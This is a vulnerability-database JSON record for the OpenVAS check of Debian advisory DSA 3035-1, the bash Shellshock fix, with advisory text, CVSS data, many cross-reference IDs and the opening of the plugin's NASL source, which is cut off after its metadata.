DATABASE RESOURCES PRICING ABOUT US

{"id": "OPENVAS:1361412562310703035", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 3035-1 (bash - security update)", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169\n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat", "published": "2014-10-01T00:00:00", "modified": "2019-03-19T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703035", "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "references": ["http://www.debian.org/security/2014/dsa-3035.html"], "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "immutableFields": [], "lastseen": "2019-05-29T18:37:22", "viewCount": 102, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2014-418", "ALAS-2014-419"]}, {"type": "archlinux", "idList": ["ASA-201409-2"]}, {"type": "arista", "idList": ["ARISTA:006"]}, {"type": "attackerkb", "idList": ["AKB:26BDFAC3-8C29-40D1-B3A7-C26249A3B4D7", "AKB:5200081C-5C1D-47C7-88A9-89C269E0482E", "AKB:D0ACE522-D43F-4688-92FE-CFF1799B4890"]}, {"type": "centos", "idList": ["CESA-2014:1293", "CESA-2014:1306"]}, {"type": "cert", "idList": ["VU:252743"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1846"]}, {"type": "checkpoint_security", "idList": ["CPS:SK102673", "CPS:SK102989", "CPS:SK104443"]}, {"type": "cisa", "idList": ["CISA:B34E259AF2C60E40987A939F5D7742F9", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2014-6271", "CISA-KEV-CVE-2014-7169"]}, {"type": "cisco", "idList": ["CISCO-SA-20140926-BASH"]}, {"type": "citrix", "idList": ["CTX200217"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:13948A26B0F4A736B03310A8560A6F73"]}, {"type": "cve", "idList": ["CVE-2014-3659", "CVE-2014-3671", "CVE-2014-6271", "CVE-2014-6277", "CVE-2014-62771", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7196", "CVE-2014-7227"]}, {"type": "debian", "idList": ["DEBIAN:ACBAE732DF5CF430594D30872D7BB6CA:B482A", "DEBIAN:BFFF1A1BB8985A1554EE139FD940DFD1:B482A", "DEBIAN:DLA-63-1:7012F", "DEBIAN:DSA-3032-1:EB739", "DEBIAN:DSA-3035-1:8A617", "DEBIAN:DSA-3035-1:AEAF0"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-6271", "DEBIANCVE:CVE-2014-6277", "DEBIANCVE:CVE-2014-6278", "DEBIANCVE:CVE-2014-7169"]}, {"type": "exploitdb", "idList": ["EDB-ID:34777", "EDB-ID:34879", "EDB-ID:38849", "EDB-ID:40619", "EDB-ID:48651"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:09BAFC0653DB54EBD16EF2C94A327987", "EXPLOITPACK:282B7A409B106ACEA21CAF83B6D41BAD", "EXPLOITPACK:35CA87EB321039B8FCD10FF7077070EC", "EXPLOITPACK:47FD05A7865BD1C6E41B36173837F9F9", "EXPLOITPACK:674E0F21E3254A3C7A39F2F66070C4E6", "EXPLOITPACK:8840B58ADD10A2BC4E17132A5C7003E8", "EXPLOITPACK:8D7CD3337FF4431147D67A3C62639747", "EXPLOITPACK:9199830C2B5794BCE4073DDC29B86CF4", "EXPLOITPACK:B1EF149162970D578C2E9FBD8DA60CE1", "EXPLOITPACK:DECB95CED9B0E098AA11F83C84BC431D"]}, {"type": "f5", "idList": ["F5:K15629", "SOL15629"]}, {"type": "fedora", "idList": ["FEDORA:4A9CF241E0", "FEDORA:652DB21498", "FEDORA:6FC4121113", "FEDORA:9DB7C245AA", "FEDORA:9FE1722338"]}, {"type": "fortinet", "idList": ["FG-IR-14-030"]}, {"type": "freebsd", "idList": ["71AD81DA-4414-11E4-A33E-3C970E169BC2", "81E2B308-4A6C-11E4-B711-6805CA0B3D42"]}, {"type": "gentoo", "idList": ["GLSA-201409-09", "GLSA-201409-10"]}, {"type": "hackerone", "idList": ["H1:29839"]}, {"type": "hp", "idList": ["HP:C04468293"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20141024-01-BASH"]}, {"type": "ibm", "idList": ["0139C39E0ED48888EF6FC334B5A408C62415667035711D7DAE1D3BB2BBBCA3F0", "03BFD2D26D76C5E7FD24C265B3AB1C4D658726D972FB7039E562EEE0BD578CC0", "0684E6CA4C2678854DD2AF881EFBA469B9153F9B25226D0E89F7A8E363B90191", "0CB23FC13F3EB19A7C8056D322ACA53A2A0544016689C55669AABB31B1489BB9", "0F73246124CA58D05064BB5D07082DCA6F2A1D48630CAAC82BCFFB4A71F45CA7", "117ABC2BB4D7A895E16FCC067B9E6B9DCE6CCBE8F1CE1B3BD4A3D859DFD71577", "1525B7B67DA5402BE989F9E37182D44E4D8FAE3BB181A2DBEA5C3A5BAB647E3B", "162D755E2D0C70591844B4890170B2078AD336DE2FD431C558D0656CFA3FF9F6", "1BB3EE36ADE9265927129667C322A2BAD2DE11F9FE467A2FADEFC55721ED556B", "1C6641956F91BACFC5632640A3A0F7C2D3293056B631EF470EE3E313F25B9DCA", "1F0A215E22C30EB485B1D487514AF1026F43B577C62A1AE805C2C9DCDDF2A921", "2171324C6B19D0DF9EFFC1DD0369B83F9F3908C6A3D27810A8197FF1F4359802", "221250DD6B489029C97D621490473ABEB793A5150987E9EA8B66A1F61836221E", "26A7BDE71EA4560DCB34E2D71A77E04F6BD6F1464BE7B6966FCB08892C8C99B7", "2867ED57669AA4B34D3EF0DDF84503CFEC9E59CD944E8EFD11DEB62308D66163", "41D560AE8F8A2118AE3B0A1F8A8B1D2C1A64B23EA566FD037C06A65121B3AC9D", "542851630FD5F0CA12E39120280D90B66CBC639D15CC167486A7006068A5563D", "553D216EA2182C94D1348ABC5AC9A5C3A6378A2F7CDCE63EE588563D39A80520", "6395629A0E23989CD0E9ED3783BCF74F63DAC89B9CC91AB177C14ED746139287", "66E2077EC744F0C58908B64187C65DB343B9899133C02D3D2AD75F82D3A5771A", "6964DC74D7C00F0076CE970FCDCD238B596005A3E74FD77729ECDADA86E693C4", "69C6DC87734280D852260806EFBE5092E33CDD13BD800205307478AACD4FF4AE", "6BED381F0625A1CEE6FF30731B3F37C8E1BC1D95ED40906A48FF91875BFEA753", "755824A31DD9B55DD0683629BAB6904C07FB7FEBC90E8C8B375BDBBA7446A707", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "88EAAD0F3FB0FE6AFDEDC902492B56BAAD194DB4D47D9DD8F7935300FABD0D33", "906C6E45A71E8A432DE51C6A94712DDA0BBA3529963A8AFA9DCFE84E05DA7425", "92653814B5AD58699CB141C05798FBA49CD5D97ED94F23B96F6DFAA714EA627D", "9362FDC04C7CF0E7E11E00C238107A825074E1BBD7D4631CDE9FBBBA3D068B3A", "A054C15A595076E4A1D7AA4BC92F46B107013032C98CAEE03D3F4ED79AE98370", "A6544AE2F106D4044D792AEEA71A0CA740A53B749B99628C2699395F9F087031", "A6C5FDEF17751F9D6EC0D701C42B168DAF0AFD9B01217970935FD1F4EB568753", "ABB0647A990D7F58EF2C3F027E8FF9EC3CFCBCFED6191131D99DFB361EAE80DA", "BADBBFD3B80B37BA80822E3D89F7CE0842CD6F0C0F9476386BC6B381BF85302E", "BFA15D43F646FFC5AFD437B2E4A088CDA943E32237DE20B421F42A372083D616", "C4FDEDC3D060EDF89606BFC32AA0B02B8F40EF19D70E9CAD79641186FFE43357", "C8FEEACA92A2A3DA942D806A8DD1A62D9FF588BC8511496B60CEDE2A43134314", "CA879CAC5D259DF9801958C7109627A6039185F7E73D37875A7DA78F5F176A68", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D765B0E424B32B58901509C0B37E90B68BD6A9A3ED95D1DE2E1DF2893F546155", "E1A56F82327D8FB00BD84085E673D1401848A384A92C33B13DC0ED642E86946B", "E3E6FF1C4B7407C34CEF6142D8E94DDAFD4C205B712F9DB877A5A5023358CB67", "E9875BEF8E97815B76ED1D0FD7D59E5669EDACF80D617A93E84594F2257B2901", "ED25520B668714457490EC7907530FE368D1DD7120FD7A98A7598F3BBE3A9333", "EE50B1A5AF778319698593697BE11C93BF03E19DEE9CE25FF7BD2F12582783CA", "EE96B54621D843DBAEC73E1584C38A5C7C93422115268CA4F14F24F6540CB3F6", "F1ED0852D75B26B636AE97EEEDFC15EBA6FD53059DB84EDE5C24543996C89A7F", "FC10782A879F5738FDF43855B83775F2332A626EC335AD556DA5907A2CB0B2E9", "FEADDA47EFE90B54452280140F698F39B3035C331C1D98DE94C00F9304C7DEFC"]}, {"type": "ics", "idList": ["ICSA-14-269-01A", "ICSA-15-344-01", "ICSA-15-344-01B"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "kitploit", "idList": ["KITPLOIT:1907207623071471216", "KITPLOIT:2779031464033627796", "KITPLOIT:5052987141331551837", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905"]}, {"type": "lenovo", "idList": ["LENOVO:PS500044-GNU-BOURNE-AGAIN-SHELL-BASH-SHELLSHOCK-NOSID", "LENOVO:PS500044-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2014-0388", "MGASA-2014-0393"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-APACHE_MOD_CGI_BASH_ENV-", "MSF:EXPLOIT-LINUX-HTTP-ADVANTECH_SWITCH_BASH_ENV_EXEC-", "MSF:EXPLOIT-LINUX-HTTP-IPFIRE_BASHBUG_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_MOD_CGI_BASH_ENV_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-CUPS_BASH_ENV_EXEC-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201454156", "MYHACK58:62201454165"]}, {"type": "nessus", "idList": ["ALA_ALAS-2014-418.NASL", "ALA_ALAS-2014-419.NASL", "BASH_CVE_2014_6271_RCE.NASL", "BASH_CVE_2014_6278.NASL", "BASH_CVE_2014_7169.NASL", "BASH_REMOTE_CODE_EXECUTION.NASL", "BASH_REMOTE_CODE_EXECUTION_TELNET.NASL", "CENTOS_RHSA-2014-1293.NASL", "CENTOS_RHSA-2014-1306.NASL", "CHECK_POINT_GAIA_SK102673.NASL", "CISCO-SA-20140926-BASH-NXOS.NASL", "CISCO-SA-CSCUR01959-ASA-CX.NASL", "CISCO-SA-CSCUR01959-PRSM.NASL", "CISCO_CUPS_CSCUR05454.NASL", "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "CISCO_TELEPRESENCE_VCS_CSCUR01461.NASL", "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "CUPS_BASH_RCE.NBIN", "DEBIAN_DLA-63.NASL", "DEBIAN_DSA-3032.NASL", "DEBIAN_DSA-3035.NASL", "EULEROS_SA-2019-1418.NASL", "F5_BIGIP_SOL15629.NASL", "FEDORA_2014-11295.NASL", "FEDORA_2014-11360.NASL", "FEDORA_2014-11503.NASL", "FEDORA_2014-11514.NASL", "FEDORA_2014-11527.NASL", "FEDORA_2014-11718.NASL", "FEDORA_2014-12202.NASL", "FREEBSD_PKG_71AD81DA441411E4A33E3C970E169BC2.NASL", "FREEBSD_PKG_81E2B3084A6C11E4B7116805CA0B3D42.NASL", "GENTOO_GLSA-201409-09.NASL", "GENTOO_GLSA-201409-10.NASL", "IBM_STORWIZE_1_5_0_4.NASL", "JUNIPER_SPACE_JSA10648.NASL", "MACOSX_10_10.NASL", "MACOSX_SECUPD2014-005.NASL", "MACOSX_SHELLSHOCK_UPDATE.NASL", "MANDRIVA_MDVSA-2014-186.NASL", "MANDRIVA_MDVSA-2014-190.NASL", "MANDRIVA_MDVSA-2015-164.NASL", "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "MCAFEE_NGFW_SB10085.NASL", "MCAFEE_WEB_GATEWAY_SB10085.NASL", "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "OPENSUSE-2014-559.NASL", "OPENSUSE-2014-563.NASL", "OPENSUSE-2014-564.NASL", "OPENSUSE-2014-567.NASL", "OPENSUSE-2014-594.NASL", "OPENSUSE-2014-595.NASL", "ORACLELINUX_ELSA-2014-1293.NASL", "ORACLELINUX_ELSA-2014-1294.NASL", "ORACLELINUX_ELSA-2014-1306.NASL", "ORACLELINUX_ELSA-2014-3075.NASL", "ORACLELINUX_ELSA-2014-3076.NASL", "ORACLELINUX_ELSA-2014-3077.NASL", "ORACLELINUX_ELSA-2014-3078.NASL", "ORACLELINUX_ELSA-2014-3079.NASL", "ORACLEVM_OVMSA-2014-0021.NASL", "ORACLEVM_OVMSA-2014-0022.NASL", "ORACLEVM_OVMSA-2014-0024.NASL", "ORACLEVM_OVMSA-2017-0050.NASL", "PALO_ALTO_PAN-SA-2014-0004.NASL", "PROFTPD_BASH_INJECTION.NASL", "REDHAT-RHSA-2014-1293.NASL", "REDHAT-RHSA-2014-1294.NASL", "REDHAT-RHSA-2014-1306.NASL", "REDHAT-RHSA-2014-1311.NASL", "REDHAT-RHSA-2014-1354.NASL", "SHELLSHOCK_MAIL_AGENTS.NASL", "SHELLSHOCK_POSTFIX_FILTERS.NASL", "SHELLSHOCK_QMAIL.NASL", "SHELLSHOCK_SIP_INVITE.NASL", "SLACKWARE_SSA_2014-267-01.NASL", "SLACKWARE_SSA_2014-268-01.NASL", "SLACKWARE_SSA_2014-268-02.NASL", "SL_20140924_BASH_ON_SL5_X.NASL", "SL_20140926_BASH_ON_SL5_X.NASL", "SOLARIS10_126546-06.NASL", "SOLARIS10_126546.NASL", "SOLARIS10_X86_126547.NASL", "SOLARIS11_BASH_20141031.NASL", "SOLARIS11_BASH_20141031_2.NASL", "SOLARIS11_BASH_2014_10_07.NASL", "SOLARIS9_149079-01.NASL", "SOLARIS9_149079.NASL", "SOLARIS9_X86_149080-01.NASL", "SOLARIS9_X86_149080.NASL", "SUSE_11_BASH-140919.NASL", "SUSE_11_BASH-140926.NASL", "UBUNTU_USN-2362-1.NASL", "UBUNTU_USN-2363-1.NASL", "UBUNTU_USN-2363-2.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0010.NASL", "VMWARE_NSX_VMSA_2014_0010.NASL", "VMWARE_VCENTER_CONVERTER_2014-0010.NASL", "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2014-0010.NASL", "VMWARE_VMSA-2014-0010.NASL", "VMWARE_VMSA-2014-0010_REMOTE.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL", "VMWARE_WORKSPACE_PORTAL_VMSA2014-0010.NASL", "WEB_APPLICATION_SCANNING_112578"]}, {"type": "nmap", "idList": ["NMAP:HTTP-SHELLSHOCK.NSE"]}, {"type": "nvidia", "idList": ["NVIDIA:4386"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105093", "OPENVAS:1361412562310105094", "OPENVAS:1361412562310105146", "OPENVAS:1361412562310105156", "OPENVAS:1361412562310105684", "OPENVAS:1361412562310105693", "OPENVAS:1361412562310120077", "OPENVAS:1361412562310120078", "OPENVAS:1361412562310121272", "OPENVAS:1361412562310121273", "OPENVAS:1361412562310123299", "OPENVAS:1361412562310123300", "OPENVAS:1361412562310123301", "OPENVAS:1361412562310123302", "OPENVAS:1361412562310123304", "OPENVAS:1361412562310703032", "OPENVAS:1361412562310802082", "OPENVAS:1361412562310802085", "OPENVAS:1361412562310802086", "OPENVAS:1361412562310804489", "OPENVAS:1361412562310804490", "OPENVAS:1361412562310841984", "OPENVAS:1361412562310841986", "OPENVAS:1361412562310841987", "OPENVAS:1361412562310850615", "OPENVAS:1361412562310850616", "OPENVAS:1361412562310850618", "OPENVAS:1361412562310850676", "OPENVAS:1361412562310850768", "OPENVAS:1361412562310850778", "OPENVAS:1361412562310850890", "OPENVAS:1361412562310850945", "OPENVAS:1361412562310850988", "OPENVAS:1361412562310868208", "OPENVAS:1361412562310868211", "OPENVAS:1361412562310868358", "OPENVAS:1361412562310871248", "OPENVAS:1361412562310871250", "OPENVAS:1361412562310882027", "OPENVAS:1361412562310882028", "OPENVAS:1361412562310882030", "OPENVAS:1361412562310882031", "OPENVAS:1361412562310882032", "OPENVAS:1361412562310882033", "OPENVAS:1361412562311220191418", "OPENVAS:703032", "OPENVAS:703035"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2014-1972960"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-1293", "ELSA-2014-1294", "ELSA-2014-1306", "ELSA-2014-3075", "ELSA-2014-3076", "ELSA-2014-3077", "ELSA-2014-3078", "ELSA-2014-3079"]}, {"type": "osv", "idList": ["OSV:DLA-59-1", "OSV:DLA-63-1", "OSV:DSA-3032-1", "OSV:DSA-3035-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128394", "PACKETSTORM:128395", "PACKETSTORM:128418", "PACKETSTORM:128425", "PACKETSTORM:128442", "PACKETSTORM:128443", "PACKETSTORM:128444", "PACKETSTORM:128447", "PACKETSTORM:128460", "PACKETSTORM:128481", "PACKETSTORM:128482", "PACKETSTORM:128520", "PACKETSTORM:128522", "PACKETSTORM:128535", "PACKETSTORM:128554", "PACKETSTORM:128572", "PACKETSTORM:128573", "PACKETSTORM:128650", "PACKETSTORM:128878", "PACKETSTORM:129260", "PACKETSTORM:129292", "PACKETSTORM:131073", "PACKETSTORM:133070", "PACKETSTORM:134594", "PACKETSTORM:137376", "PACKETSTORM:139304", "PACKETSTORM:140205", "PACKETSTORM:144424", "PACKETSTORM:149467", "PACKETSTORM:150687"]}, {"type": "paloalto", "idList": ["PAN-SA-2014-0004"]}, {"type": "redhat", "idList": ["RHSA-2014:1293", "RHSA-2014:1294", "RHSA-2014:1295", "RHSA-2014:1306", "RHSA-2014:1311", "RHSA-2014:1312", "RHSA-2014:1354", "RHSA-2014:1865"]}, {"type": "saint", "idList": ["SAINT:115143B4FAD70F6ECA6FF95A951FEA51", "SAINT:2AE124BF9DEB7BF62DF04248DEE949D2", "SAINT:2E3ECAFB8AE7339B98B8B66F6B3CB6B6", "SAINT:49E3C4DD42AD3A5B772ACBDD5C6E1DBD", "SAINT:5BBB36CD07D0D401F363CA3F726533A5", "SAINT:5C86AB1074A96B306662C51ADE6F4B61", "SAINT:7C12BAFAA5D8DBBC0D183D44EB230ABB", "SAINT:9764B1C9A7FFDFC322F184608200C05E", "SAINT:A192C3991EB7069FAA4A6A96BA76C435", "SAINT:B20ACFE275443E794149275B36EB8F99", "SAINT:E7D41DAA0FE2CCB57388A4812EEC9C00", "SAINT:EA7480D87E33A13B3179AF9B56E84AFC"]}, {"type": "securelist", "idList": ["SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31100", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:31103", "SECURITYVULNS:DOC:31106", "SECURITYVULNS:DOC:31125", "SECURITYVULNS:DOC:31129", "SECURITYVULNS:DOC:31130", "SECURITYVULNS:DOC:31131", "SECURITYVULNS:DOC:31135", "SECURITYVULNS:DOC:31147", "SECURITYVULNS:DOC:31150", "SECURITYVULNS:DOC:31299", "SECURITYVULNS:DOC:32393", "SECURITYVULNS:VULN:13977", "SECURITYVULNS:VULN:14050"]}, {"type": "seebug", "idList": ["SSV:87270", "SSV:87294", "SSV:87313", "SSV:87317", "SSV:87331", "SSV:88877"]}, {"type": "slackware", "idList": ["SSA-2014-0925160703", "SSA-2014-0925230703", "SSA-2014-267-01", "SSA-2014-268-01", "SSA-2014-272-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:1226-1", "OPENSUSE-SU-2014:1229-1", "OPENSUSE-SU-2014:1238-1", "OPENSUSE-SU-2014:1242-1", "OPENSUSE-SU-2014:1254-1", "SUSE-SU-2014:1212-1", "SUSE-SU-2014:1213-1", "SUSE-SU-2014:1214-1", "SUSE-SU-2014:1223-1", "SUSE-SU-2014:1247-1", "SUSE-SU-2014:1247-2", "SUSE-SU-2014:1259-1", "SUSE-SU-2014:1260-1", "SUSE-SU-2014:1287-1", "SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"]}, {"type": "symantec", "idList": ["SMNTC-70103"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387"]}, {"type": "thn", "idList": ["THN:1859301C4A1DFB7CAC529CC0D8AA84DD", "THN:491E94A14CDEFCFFF9753033F61D1E0E", "THN:EC04962528DE0054EC31C2501125E303"]}, {"type": "threatpost", "idList": ["THREATPOST:1C58BC6383AE29EEEDCF326556EF6630", "THREATPOST:1DED483898A12D8F4397D8C01339AC63", "THREATPOST:87BEB3651A26414841F6C10CC8797A19", "THREATPOST:DBB88263397DE4DA6604A2D6517DC194", "THREATPOST:F6AE4A5AF20D9E9C8BE6663E8FC80848"]}, {"type": "ubuntu", "idList": ["USN-2362-1", "USN-2363-1", "USN-2363-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-6271", "UB:CVE-2014-6277", "UB:CVE-2014-6278", "UB:CVE-2014-7169"]}, {"type": "vmware", "idList": ["VMSA-2014-0010", "VMSA-2014-0010.13"]}, {"type": "zdt", "idList": ["1337DAY-ID-22691", "1337DAY-ID-22692", "1337DAY-ID-22693", "1337DAY-ID-22696", "1337DAY-ID-22699", "1337DAY-ID-22701", "1337DAY-ID-22703", "1337DAY-ID-22713", "1337DAY-ID-22754", "1337DAY-ID-22807", "1337DAY-ID-22882", "1337DAY-ID-23442", "1337DAY-ID-23443", "1337DAY-ID-24039", "1337DAY-ID-24647", "1337DAY-ID-25423", "1337DAY-ID-25954", "1337DAY-ID-26550", "1337DAY-ID-28706", "1337DAY-ID-31147", "1337DAY-ID-31749"]}]}, "score": {"value": 9.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2014-419"]}, {"type": "archlinux", "idList": ["ASA-201409-2"]}, {"type": "attackerkb", "idList": ["AKB:D0ACE522-D43F-4688-92FE-CFF1799B4890"]}, {"type": "centos", "idList": ["CESA-2014:1293", "CESA-2014:1306"]}, {"type": "checkpoint_security", "idList": ["CPS:SK102673", "CPS:SK102989", "CPS:SK104443"]}, {"type": "cisa", "idList": ["CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4"]}, {"type": "cisco", "idList": ["CISCO-SA-20140926-BASH"]}, {"type": "cve", "idList": ["CVE-2014-6271", "CVE-2014-7169"]}, {"type": "debian", "idList": ["DEBIAN:BFFF1A1BB8985A1554EE139FD940DFD1:B482A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-6271", "DEBIANCVE:CVE-2014-7169"]}, {"type": "exploitdb", "idList": ["EDB-ID:34839", "EDB-ID:39918", "EDB-ID:40619"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:09BAFC0653DB54EBD16EF2C94A327987", "EXPLOITPACK:8840B58ADD10A2BC4E17132A5C7003E8"]}, {"type": "fedora", "idList": ["FEDORA:9DB7C245AA"]}, {"type": "gentoo", "idList": ["GLSA-201409-09"]}, {"type": "hackerone", "idList": ["H1:29839"]}, {"type": "hp", "idList": ["HP:C04468293"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20141024-01-BASH"]}, {"type": "ibm", "idList": ["03BFD2D26D76C5E7FD24C265B3AB1C4D658726D972FB7039E562EEE0BD578CC0", "1525B7B67DA5402BE989F9E37182D44E4D8FAE3BB181A2DBEA5C3A5BAB647E3B", "1F0A215E22C30EB485B1D487514AF1026F43B577C62A1AE805C2C9DCDDF2A921", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "BFA15D43F646FFC5AFD437B2E4A088CDA943E32237DE20B421F42A372083D616"]}, {"type": "ics", "idList": ["ICSA-15-344-01"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SERVER/DHCLIENT_BASH_ENV", "MSF:EXPLOIT/MULTI/FTP/PUREFTPD_BASH_ENV_EXEC"]}, {"type": "myhack58", "idList": ["MYHACK58:62201454156"]}, {"type": "nessus", "idList": ["ALA_ALAS-2014-418.NASL", "CENTOS_RHSA-2014-1293.NASL", "DEBIAN_DSA-3032.NASL", "EULEROS_SA-2019-1418.NASL", "FEDORA_2014-11503.NASL", "FEDORA_2014-11718.NASL", "MANDRIVA_MDVSA-2014-190.NASL", "MANDRIVA_MDVSA-2015-164.NASL", "OPENSUSE-2014-595.NASL", "ORACLELINUX_ELSA-2014-3075.NASL", "REDHAT-RHSA-2014-1354.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-SHELLSHOCK.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121273", "OPENVAS:1361412562310703032", "OPENVAS:1361412562310802082", "OPENVAS:1361412562310804490", "OPENVAS:1361412562310850618", "OPENVAS:1361412562310850676", "OPENVAS:1361412562310882030", "OPENVAS:1361412562311220191418"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-1293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128447", "PACKETSTORM:128572", "PACKETSTORM:133070", "PACKETSTORM:134594", "PACKETSTORM:137376"]}, {"type": "redhat", "idList": ["RHSA-2014:1354"]}, {"type": "saint", "idList": ["SAINT:5C86AB1074A96B306662C51ADE6F4B61", "SAINT:B20ACFE275443E794149275B36EB8F99"]}, {"type": "securelist", "idList": ["SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31100", "SECURITYVULNS:DOC:31103", "SECURITYVULNS:VULN:13977", "SECURITYVULNS:VULN:14050"]}, {"type": "seebug", "idList": ["SSV:87270"]}, {"type": "slackware", "idList": ["SSA-2014-0925160703"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:1226-1"]}, {"type": "symantec", "idList": ["SMNTC-70103"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387"]}, {"type": "thn", "idList": ["THN:491E94A14CDEFCFFF9753033F61D1E0E"]}, {"type": "threatpost", "idList": ["THREATPOST:1C58BC6383AE29EEEDCF326556EF6630", "THREATPOST:87BEB3651A26414841F6C10CC8797A19"]}, {"type": "ubuntu", "idList": ["USN-2363-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-7169"]}, {"type": "vmware", "idList": ["VMSA-2014-0010"]}, {"type": "zdt", "idList": ["1337DAY-ID-22754", "1337DAY-ID-22807", "1337DAY-ID-28706"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2014-7169", "epss": "0.973900000", "percentile": "0.998220000", "modified": "2023-03-15"}, {"cve": "CVE-2014-6271", "epss": "0.975600000", "percentile": "0.999940000", "modified": "2023-03-15"}], "vulnersScore": 9.6}, "_state": {"dependencies": 1678916735, "score": 1683994424, "epss": 1678936357}, "_internal": {"score_hash": "4b614ceb5d97767cfe70f23a0932f1fe"}, "pluginID": "1361412562310703035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3035.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3035-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703035\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_name(\"Debian Security Advisory DSA 3035-1 (bash - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:22 +0530 (Wed, 01 Oct 2014)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3035.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n 